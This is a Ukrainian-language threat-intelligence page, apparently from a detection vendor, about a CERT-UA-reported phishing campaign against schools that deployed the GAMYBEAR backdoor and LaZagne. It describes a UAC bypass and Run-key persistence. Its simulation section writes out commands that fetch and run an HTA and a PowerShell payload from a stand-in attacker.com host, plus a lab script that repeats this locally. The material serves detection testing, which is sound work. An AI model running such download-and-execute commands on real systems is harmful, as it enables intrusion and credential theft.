Цілеспрямована кібер-атака на школу в східній Україні з використанням інструменту GAMYBEAR (CERT-UA#18329)
Стежити
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Кампанія зі збору облікових даних вразила школи та державні установи у Сумській області через фішинговий електронний лист зі вкладенням у форматі ZIP. Відкриття архіву викликало файл HTA через mshta утиліту, яка потім завантажила скрипти PowerShell для розгортання бекдору GAMYBEAR та дампера облікових даних LaZagne, встановила C2 на основі HTTP і ексфільтрацію файлів із цільових директорій.
Аналіз атаки
CERT-UA зв’язала початкове порушення з фішинговим повідомленням, надісланим 26 травня 2025 року з викраденого облікового запису Gmail, надавши деталі кампанії в сповіщенні CERT-UA#18329. Судова експертиза виявила багатоступінчастий ланцюг зараження: ZIP → HTA → update.js → PowerShell → GAMYBEAR у супроводі зловмисного ПЗ LaZagne, з підтримкою стійкості через запис у реєстрі Run та періодичні завантаження з зловмисних URL.
Захист
Забезпечте багатофакторну аутентифікацію для всіх облікових записів електронної пошти, блокуйте виконання HTA та ненадійних скриптів PowerShell, закрийте ключ реєстру Run та впровадьте білий список додатків. Постійно оновлюйте правила виявлення на кінцевих точках, щоб розпізнавати зазначені імена файлів, хеши та мережеві індикатори.
Відповідь
Негайно ізолюйте уражені кінцеві точки, скиньте скомпрометовані облікові дані Gmail, зберіть всі визначені ІОС та проведіть комплексну перевірку на наявність GAMYBEAR, LaZagne та супутніх артефактів. Повідомте CERT-UA про інцидент та розповсюдьте ІОС через відповідні канали обміну кіберзагрозами.
graph TB %% Визначення класів classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff %% Вузли action_phishing[“<b>Дія</b> – <b>T1566.001 Фішинг: Цільовий фішинг із вкладенням</b><br/>Скомпрометовано університетський обліковий запис Gmail та надіслано цільові фішингові листи з ZIP-вкладенням під назвою \”Накaз № 332\”.”] class action_phishing action tool_mshta[“<b>Інструмент</b> – <b>Назва</b>: mshta.exe<br/><b>Техніка</b>: T1218.005 Виконання системного бінарного проксі”] class tool_mshta tool malware_hta[“<b>Шкідливе ПЗ</b> – <b>Назва</b>: zvit.hta (HTML Application)<br/>Виконується через ярлик із ZIP-вкладення.”] class malware_hta malware action_powershell[“<b>Дія</b> – <b>T1059.001 Командний інтерпретатор і скрипти: PowerShell</b><br/>HTA запустив update.js, який стартував updater.ps1. PowerShell завантажив додаткові бінарні файли (be53ff4f4b5daa.exe, svshosts.exe) із віддалених HTTP-серверів.”] class action_powershell action tool_ps2exe[“<b>Інструмент</b> – <b>Назва</b>: PS2EXE<br/><b>Техніка</b>: T1027.004 Компіляція після доставки (обфускація)”] class tool_ps2exe tool action_uac_bypass[“<b>Дія</b> – <b>T1548.002 Зловживання механізмом підвищення прав: Обхід UAC</b><br/>Створено ключ HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command з параметром DelegateExecute для обходу контролю облікових записів користувача.”] class action_uac_bypass action action_persistence[“<b>Дія</b> – <b>T1547.014 Автозапуск при завантаженні або вході</b><br/>Додано записи HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run (IEUpdater, ServiceUpdateService) для запуску бінарних файлів під час входу користувача.”] class action_persistence action tool_registry[“<b>Інструмент</b> – <b>Назва</b>: Зміна реєстру<br/><b>Техніка</b>: Стійкість через Run ключі”] class tool_registry tool action_credential_dump[“<b>Дія</b> – <b>T1003 Знімання облікових даних ОС</b><br/>Запуск LaZagne (be53ff4f4b5daa.exe) для витягання збережених паролів та інших облікових даних.”] class action_credential_dump action tool_lazagne[“<b>Інструмент</b> – <b>Назва</b>: LaZagne<br/><b>Призначення</b>: Отримання збережених облікових даних з браузерів, поштових клієнтів та інших програм”] class tool_lazagne tool action_data_encoding[“<b>Дія</b> – <b>T1132 Кодування даних</b><br/>Комунікації між компонентами бекдору GAMYBEAR (svshosts.exe, ieupdater.exe) та C2 передавалися по HTTP із Base64-кодованими даними.”] class action_data_encoding action malware_gamybear[“<b>Шкідливе ПЗ</b> – <b>Назва</b>: Бекдор GAMYBEAR<br/>Компоненти включають svshosts.exe та ieupdater.exe.”] class malware_gamybear malware %% Зв’язки action_phishing –>|доставляє| tool_mshta tool_mshta –>|виконує| malware_hta malware_hta –>|запускає| action_powershell action_powershell –>|використовує| tool_ps2exe action_powershell –>|завантажує| malware_gamybear action_powershell –>|створює| action_uac_bypass action_uac_bypass –>|модифікує| tool_registry action_persistence –>|спирається на| tool_registry action_persistence –>|запускає| malware_gamybear action_credential_dump –>|використовує| tool_lazagne tool_lazagne –>|збирає| action_data_encoding malware_gamybear –>|спілкується через| action_data_encoding
Потік Атаки
Виявлення
Виявлення комунікації GAMYBEAR C2 [Мережеве з’єднання Windows]
Переглянути
Виявлення виконання бекдору GAMYBEAR [Подія файлу Windows]
Переглянути
Виявлення mshta.exe та виконання PowerShell з обхідним [Створення процесу Windows]
Переглянути
Ідентифікатори (HashSha1) для виявлення: Кібератака на освітній заклад на сході України з використанням інструмента GAMYBEAR (CERT-UA#18329)
Переглянути
Ідентифікатори (DestinationIP) для виявлення: Кібератака на освітній заклад на сході України з використанням інструмента GAMYBEAR (CERT-UA#18329)
Переглянути
Симуляції
Виконання симуляції
Передумова: Перевірка телеметрії та базової лінії повинна бути успішно пройдена.
Обґрунтування: Цей розділ детально описує точне виконання техніки супротивника (TTP), розроблене для виклику правила виявлення. Команди та наратив мають безпосередньо відображати виявлені TTP та націлені на створення точної телеметрії, очікуваної логікою виявлення.
-
Опис атаки та команди:
-
Етап 1 – Розгортання зловмисного HTA: Нападник розміщує
evil.htaна скомпрометованому веб-сервері. -
Етап 2 – Виконання через
mshta.exe: Використовуючи командний рядок Windows, нападник запускаєmshta.exe http://attacker.com/evil.hta. Це створює подію створення процесу зmshta.exeу командному рядку, задовольняючи перший пункт правила. -
Етап 3 – Обхід PowerShell: Щоб виконати корисне навантаження, яке обходить політику виконання системи, нападник запускає PowerShell з прапором
-ep bypass:PowerShell -ep bypass -Command "Invoke-WebRequest http://attacker.com/payload.ps1 -OutFile $env:TEMPp.ps1; & $env:TEMPp.ps1"Це генерує другу подію створення процесу, що містить точний рядок
PowerShell -ep bypass, задовольняючи другий пункт.
-
-
Скрипт регресивного тестування: Наведений нижче PowerShell скрипт відтворює вищезгадані кроки в автоматизованій, повторюваній манері.
# ------------------------------------------------- # Регресивний тест – Виклик Sigma Rule для mshta та PowerShell -ep bypass # ------------------------------------------------- # Змінні – налаштуйте для вашого лабораторного середовища $htaUrl = "http://127.0.0.1/evil.hta" # Повинен вказувати на досяжний файл HTA $psUrl = "http://127.0.0.1/payload.ps1" # Простий PS-пейлоад (наприклад, `Write-Host "pwned"`) # 1. Виклик mshta.exe Write-Host "[*] Запуск mshta.exe з параметром $htaUrl" Start-Process -FilePath "mshta.exe" -ArgumentList $htaUrl -NoNewWindow # Коротка пауза для забезпечення реєстрації процесу Start-Sleep -Seconds 2 # 2. Виклик PowerShell з обходом політики виконання $psCmd = "Invoke-WebRequest $psUrl -UseBasicParsing -OutFile $env:TEMPp.ps1; & $env:TEMPp.ps1" Write-Host "[*] Запуск PowerShell -ep bypass" Start-Process -FilePath "powershell.exe" -ArgumentList "-ep bypass -Command `"$psCmd`"" -NoNewWindow # Пауза для дозволу реєстрації Start-Sleep -Seconds 5 Write-Host "[+] Тест завершено. Перевірте ваш SIEM на наявність попереджень." -
Команди очищення: Видаліть тимчасові файли та завершіть будь-які завислі процеси тестування.
# Вилучення тимчасового пейлоаду Remove-Item -Path "$env:TEMPp.ps1" -ErrorAction SilentlyContinue # Додатково завершити процеси mshta або PowerShell, створені тестом Get-Process -Name mshta, powershell -ErrorAction SilentlyContinue | Where-Object { $_.Id -ne $PID } | Stop-Process -Force